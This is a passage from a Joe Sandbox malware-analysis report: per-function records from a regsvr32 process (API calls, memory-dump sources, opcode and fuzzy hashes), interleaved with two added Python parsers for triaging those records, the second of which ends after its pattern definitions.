• Instruction Fuzzy Hash: EB415A7091C7888FD7B4DF58D4857AABBE0FBC8314F108A1EE48DD7255DB7498458B82
Uniqueness
Uniqueness Score: -1.00%
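Every function record on this page uses the same layout (APIs, Memory Dump Source, Similarity, Uniqueness), and the triage question they answer is which functions were lifted from regsvr32's own module image at 0x7FFFEFB50000 (based on PE: true, CRT routines such as FlsAlloc and EncodePointer) and which from the non-PE-backed region at 0x180001000 that carries the Yara match and the CreateProcessW call in its control-flow graph. The parser below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling; it reads the layout as it appears on this page, and its SAMPLE input is a constructed excerpt of two records copied from the report with some fields dropped. The two cross-field checks it applies (Opcode ID equals Opcode Fuzzy Hash; the second half of API String ID is 0 exactly when String ID is empty) are regularities observed in these records, not documented Joe Sandbox semantics.

```python
"""Parse the per-function records of a Joe Sandbox report (the blocks headed
Memory Dump Source / Similarity / Uniqueness) and summarise them per memory region.
Added example, not part of the Joe Sandbox report or of Joe Security's tooling; the
layout is read off the report text. SAMPLE is a constructed two-record excerpt."""
import re
from collections import defaultdict

SAMPLE = """\
APIs
  • Part of subcall function 00007FFFEFB936F0: _initp_misc_winsig.LIBCMT ref: 00007FFFEFB93729
• FlsAlloc.KERNEL32(?,?,?,00007FFFEFB92179), ref: 00007FFFEFB92FBB
• GetCurrentThreadId.KERNEL32 ref: 00007FFFEFB93000
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
Similarity
• API ID: _lock$AllocCurrentEncodePointerSleepThreadValue_initp_misc_winsig
• String ID:
• API String ID: 54287522-0
• Opcode ID: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
• Opcode Fuzzy Hash: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 618 180001bdc-180001cab call 1800142a0 621 180001d21-180001d64 CreateProcessW 618->621 622 180001cad-180001d1b call 18000dd70 618->622 622->621
Memory Dump Source
• Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Yara matches
Similarity
• API ID: CreateProcess
• String ID: :}
• API String ID: 963392458-2902022129
• Opcode ID: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
• Opcode Fuzzy Hash: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
Uniqueness Score: -1.00%
"""

HEADINGS = {"Control-flow Graph", "APIs", "Strings", "Memory Dump Source",
            "Joe Sandbox IDA Plugin", "Yara matches", "Similarity", "Uniqueness"}
SOURCE_RE = re.compile(r"Source File:\s*(?P<dump>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
                       r"\s*based on PE:\s*(?P<pe>true|false)")
API_RE = re.compile(r"^(?P<nested>Part of subcall function [0-9A-Fa-f]+:\s*)?"
                    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)")
FIELD_RE = re.compile(r"^(?P<key>API ID|API String ID|String ID|Opcode ID|Instruction ID|"
                      r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(?P<val>.*)$")


def parse_records(text):
    """One dict per function record; a record is closed by its 'Uniqueness Score' line."""
    records, cur, section = [], {"apis": [], "yara": False, "cfg": None}, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()          # drop indentation and bullets
        if not line:
            continue
        if line in HEADINGS:
            section = line
            if line == "Yara matches":                  # heading only present on Yara hits
                cur["yara"] = True
        elif line.startswith("Uniqueness Score:"):
            cur["uniqueness"] = line.split(":", 1)[1].strip()
            if "dump" in cur:                           # skip a leading partial record
                records.append(cur)
            cur, section = {"apis": [], "yara": False, "cfg": None}, None
        elif section == "APIs" and (m := API_RE.match(line)):
            cur["apis"].append((m["api"], m["mod"], m["nested"] is not None))
        elif section == "Control-flow Graph" and line.startswith("control_flow_graph"):
            cur["cfg"] = line
        elif section == "Memory Dump Source" and (m := SOURCE_RE.search(line)):
            cur.update(dump=m["dump"], offset=int(m["offset"], 16), pe_backed=m["pe"] == "true")
        elif section == "Similarity" and (m := FIELD_RE.match(line)):
            cur[m["key"]] = m["val"].strip()
    return records


def cfg_call_targets(cfg_line):
    """Named call targets in a control_flow_graph dump; node ids, hex ranges and edges skipped."""
    toks = re.findall(r"\b[A-Za-z_]\w*", cfg_line or "")
    return sorted({t for t in toks if t not in {"control_flow_graph", "call"}
                   and not re.fullmatch(r"[0-9A-Fa-f]+", t)})


def consistency_issues(rec):
    """Cross-field checks observed to hold on this report's records."""
    issues = []
    if rec.get("Opcode ID") != rec.get("Opcode Fuzzy Hash"):
        issues.append("Opcode ID differs from Opcode Fuzzy Hash")
    str_hash = rec.get("API String ID", "").partition("-")[2]   # second half is 0 iff no string
    if (str_hash == "0") != (rec.get("String ID", "") == ""):
        issues.append("String ID and API String ID disagree")
    return issues


def region_summary(records):
    """Group by (image base, PE-backed?) so the host module's CRT code separates from the
    non-PE-backed region that carries the Yara hit."""
    groups = defaultdict(list)
    for r in records:
        groups[(r["offset"], r["pe_backed"])].append(r)
    return {f"{base:#x}": {
        "pe_backed": pe, "functions": len(recs),
        "yara_hits": sum(r["yara"] for r in recs),
        "direct_apis": sorted({a for r in recs for a, _, nested in r["apis"] if not nested}),
        "cfg_calls": sorted({c for r in recs for c in cfg_call_targets(r["cfg"])}),
        "api_ids": sorted({r.get("API ID", "") for r in recs}),
        "issues": sorted({i for r in recs for i in consistency_issues(r)}),
    } for (base, pe), recs in groups.items()}
```

Feed the whole function section of a report to `region_summary(parse_records(text))` and the non-PE-backed region stands out by its Yara hits, its empty CRT-style API IDs and the named call targets in its control-flow graph (here only CreateProcessW); the Opcode Fuzzy Hash values in that region are the ones worth pivoting on against other samples, since the host module's CRT functions are shared by every regsvr32 instance.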

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: ExitProcess
• String ID: JKvDDasqwOPvGXZdqW
• API String ID: 621844428-4059861069
• Opcode ID: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
• Instruction ID: 3c00611eabfb7d1f25956a01fd535586cf3163ca6dfda2ab760e4765785ad161
• Opcode Fuzzy Hash: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
• Instruction Fuzzy Hash: 92D09221A18A8282DA20AB10E81535A73E5FB89368FC00230D58C4A6B9EF7CD25ACB05
Uniqueness
Uniqueness Score: -1.00%

APIs
• _errno.LIBCMT ref: 00007FFFEFB96D0F
  • Part of subcall function 00007FFFEFB966D8: DecodePointer.KERNEL32 ref: 00007FFFEFB966FF
• RtlAllocateHeap.NTDLL(?,?,?,?,00000000,00007FFFEFB9313B,?,?,0000000A,00007FFFEFB92DA3,?,?,?,00007FFFEFB92DFF), ref: 00007FFFEFB96D58
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
• Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
Similarity
• API ID: AllocateDecodeHeapPointer_errno
• String ID:
• API String ID: 15861996-0
• Opcode ID: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
• Instruction ID: 740f7adf50f5e66c253b34a370015ba52cfd7ed0d2e04f0f01974993be61d929
• Opcode Fuzzy Hash: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
• Instruction Fuzzy Hash: 4D11CA22B0D24382FB154F25E60437972EBAF807F4F189A34CE2D06AF5EE6CA4008602
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • _initp_misc_winsig.LIBCMT ref: 00007FFFEFB93729
                                                                                                                                  • Part of subcall function 00007FFFEFB9755C: EncodePointer.KERNEL32(?,?,?,?,00007FFFEFB9373E,?,?,?,00007FFFEFB92FAB,?,?,?,00007FFFEFB92179), ref: 00007FFFEFB97567
                                                                                                                                • EncodePointer.KERNEL32(?,?,?,00007FFFEFB92FAB,?,?,?,00007FFFEFB92179), ref: 00007FFFEFB93745
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EncodePointer$_initp_misc_winsig
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 190222155-0
                                                                                                                                • Opcode ID: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
                                                                                                                                • Instruction ID: 9dc6cf216b08ad9dfeff0dffc78667f95c2dbcc23c42fb9fa88643fa2cb1aeea
                                                                                                                                • Opcode Fuzzy Hash: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
                                                                                                                                • Instruction Fuzzy Hash: CAF0AE00E8C64740E918FB626C627BC32D44F96BA0FA82030E81F0A3F3DD2CE5558356
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Heap$CreateInformation
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1774340351-0
                                                                                                                                • Opcode ID: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
                                                                                                                                • Instruction ID: b5f070fd58bf0a35e878e8c2cc9297a99c049a59662fc621cc43586e6c313500
                                                                                                                                • Opcode Fuzzy Hash: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
                                                                                                                                • Instruction Fuzzy Hash: 7AE04FB5A29B9283EB999B21E8097657690FB88350F909039EA4D42BE4EF3CD0458A01
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • EncodePointer.KERNEL32(?,?,?,00007FFFEFB934AF,?,?,?,00007FFFEFB921CB), ref: 00007FFFEFB9740D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EncodePointer
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2118026453-0
                                                                                                                                • Opcode ID: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
                                                                                                                                • Instruction ID: d5f06fe35be5ead8735e71bfa37f1386d92cc6221b020e6a033e281d03199fc6
                                                                                                                                • Opcode Fuzzy Hash: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
                                                                                                                                • Instruction Fuzzy Hash: 2FD05B32F5894291DB108B21F59136C33E4EB857A4F588031D65C077A5DD3CC456C701
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • Sleep.KERNEL32(?,?,0000000A,00007FFFEFB92DA3,?,?,?,00007FFFEFB92DFF,?,?,?,00007FFFEFB9254F,?,?,?,00007FFFEFB9262A), ref: 00007FFFEFB9314D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Sleep_errno
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1068366078-0
                                                                                                                                • Opcode ID: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
                                                                                                                                • Instruction ID: 3482618febb45ad4cdc27cb6af0a8281269af5fd1a1e101ecfb02587ad9ee68b
                                                                                                                                • Opcode Fuzzy Hash: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
                                                                                                                                • Instruction Fuzzy Hash: 90018632B24B9286EA549B1A9840129B7E5FB88FE0F591131EE5D07BF1DF3CE891C705
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00007FFFEFB96C34: _FF_MSGBANNER.LIBCMT ref: 00007FFFEFB96C64
                                                                                                                                  • Part of subcall function 00007FFFEFB96C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FFFEFB930C0,?,?,00000000,00007FFFEFB96B19,?,?,00000000,00007FFFEFB96BC3), ref: 00007FFFEFB96C89
                                                                                                                                  • Part of subcall function 00007FFFEFB96C34: _errno.LIBCMT ref: 00007FFFEFB96CAD
                                                                                                                                  • Part of subcall function 00007FFFEFB96C34: _errno.LIBCMT ref: 00007FFFEFB96CB8
                                                                                                                                • Sleep.KERNEL32(?,?,00000000,00007FFFEFB96B19,?,?,00000000,00007FFFEFB96BC3,?,?,?,?,?,?,00000000,00007FFFEFB92DC8), ref: 00007FFFEFB930D2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _errno$AllocateHeapSleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4153772858-0
                                                                                                                                • Opcode ID: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
                                                                                                                                • Instruction ID: dbe1d5348d9d673b465c3e7fdf024914b39055dd336ad76b497a77b96f4659cc
                                                                                                                                • Opcode Fuzzy Hash: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
                                                                                                                                • Instruction Fuzzy Hash: F8F09C32B0DB8786EA549F15A44063D72E5FB84BA0F584134EA5D437F5DF3DE8918701
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: String$free$ByteCharMultiWide$ErrorLast
                                                                                                                                • String ID: Qr2_:g
                                                                                                                                • API String ID: 1446610345-1052752507
                                                                                                                                • Opcode ID: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
                                                                                                                                • Instruction ID: fdcfb7f4208eda50ea830850fc0520b43818f4b3ad40509242b38cbc76f499ab
                                                                                                                                • Opcode Fuzzy Hash: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
                                                                                                                                • Instruction Fuzzy Hash: 48F1B132A096838AE7608F25D4402A977F1FB44BB8F944635EA5D57BF8DF3CEA418701
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DecodeErrorLastPointer_errno$AddressLibraryLoadProc
                                                                                                                                • String ID: ADVAPI32.DLL$SystemFunction036
                                                                                                                                • API String ID: 1558914745-1064046199
                                                                                                                                • Opcode ID: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
                                                                                                                                • Instruction ID: fa7bbfbdcbbc80da995b19b44784a56225918316802a3d28474dd2b0fa5c327d
                                                                                                                                • Opcode Fuzzy Hash: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
                                                                                                                                • Instruction Fuzzy Hash: A8317125F0DA4386FB10AB65A81577A73E1AF847A0FA44434EE0D47BF6EE3CE4058742
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Locale$InfoValid$CodeDefaultPageUser_getptd_itow_s
                                                                                                                                • String ID: Norwegian-Nynorsk
                                                                                                                                • API String ID: 2273835618-461349085
                                                                                                                                • Opcode ID: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
                                                                                                                                • Instruction ID: f84a4a36b4c5a5f8c2c5fe5195cd45aa59c3e016edcbf915dcc918db0e24f189
                                                                                                                                • Opcode Fuzzy Hash: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
                                                                                                                                • Instruction Fuzzy Hash: 186175A6A0878386FB659F21E4003B937E0EF45BA4F588136CA4D466F9DF3CE940C316
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                                                                                • String ID: Qr2_:g
                                                                                                                                • API String ID: 3778485334-1052752507
                                                                                                                                • Opcode ID: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
                                                                                                                                • Instruction ID: c0f4f600fb04493670b60ef02d022ab5206966afb437cf133d0d960809756e29
                                                                                                                                • Opcode Fuzzy Hash: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
                                                                                                                                • Instruction Fuzzy Hash: 7E31C335A0CF4385EA609B50F8503AA73E4FB84764F904036DA8D427B5EF7CE499C702
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FormatTime$__ascii_stricmpfree
                                                                                                                                • String ID: Qr2_:g$a/p$am/pm
                                                                                                                                • API String ID: 2252689280-3632104271
                                                                                                                                • Opcode ID: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
                                                                                                                                • Instruction ID: ec5a0699064caae3f0ac634ed8e06a03c23272526044e43203ae73d6f3c48ef2
                                                                                                                                • Opcode Fuzzy Hash: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
                                                                                                                                • Instruction Fuzzy Hash: 27F1CC26A1C69385E7748F2484943BC7BE1FB057A4F48D136EA9D47AF5DE3CAA44C302
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

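The entries above follow the Joe Sandbox function-block format: one entry per function with its API call sites (direct calls and "Part of subcall function" calls), the memory-dump source, and the Similarity identifiers (API ID and String ID joined with "$", opcode and instruction hashes). As an added example, not Joe Sandbox's own code and not part of this report, the following Python parser turns such entries into records so that the API sets and hashes can be queried: which blocks reach Sleep through a callee, and which block pairs a DLL name with an export name in its strings, the footprint of run-time resolution such as the ADVAPI32.DLL / SystemFunction036 entry above. The line patterns it matches are inferred from the entries shown here; the sample input is constructed by copying two of those entries with the "Associated" dump lines left out.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample: two function-block entries copied from the listing above,
# with the "Associated" memory-dump lines left out to keep the sample short.
SAMPLE = """\
APIs
  • Part of subcall function 00007FFFEFB96C34: _FF_MSGBANNER.LIBCMT ref: 00007FFFEFB96C64
  • Part of subcall function 00007FFFEFB96C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FFFEFB930C0,?,?,00000000,00007FFFEFB96B19,?,?,00000000,00007FFFEFB96BC3), ref: 00007FFFEFB96C89
  • Part of subcall function 00007FFFEFB96C34: _errno.LIBCMT ref: 00007FFFEFB96CAD
  • Part of subcall function 00007FFFEFB96C34: _errno.LIBCMT ref: 00007FFFEFB96CB8
• Sleep.KERNEL32(?,?,00000000,00007FFFEFB96B19,?,?,00000000,00007FFFEFB96BC3,?,?,?,?,?,?,00000000,00007FFFEFB92DC8), ref: 00007FFFEFB930D2
Memory Dump Source
• Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
Similarity
• API ID: _errno$AllocateHeapSleep
• String ID:
• API String ID: 4153772858-0
• Opcode ID: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
• Instruction Fuzzy Hash: F8F09C32B0DB8786EA549F15A44063D72E5FB84BA0F584134EA5D437F5DF3DE8918701
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Similarity
• API ID: DecodeErrorLastPointer_errno$AddressLibraryLoadProc
• String ID: ADVAPI32.DLL$SystemFunction036
• API String ID: 1558914745-1064046199
• Opcode ID: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
• Instruction Fuzzy Hash: A8317125F0DA4386FB10AB65A81577A73E1AF847A0FA44434EE0D47BF6EE3CE4058742
Uniqueness

Uniqueness Score: -1.00%
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Similarity", "Uniqueness"}
# "<name>.<module>(<args>), ref: <addr>"; LIBCMT entries carry no argument list
# and no comma, sub-call entries a "Part of subcall function <addr>:" prefix.
API_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s+)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$")
KV_RE = re.compile(r"^•\s+(?P<key>[^:]+):\s*(?P<val>.*)$")
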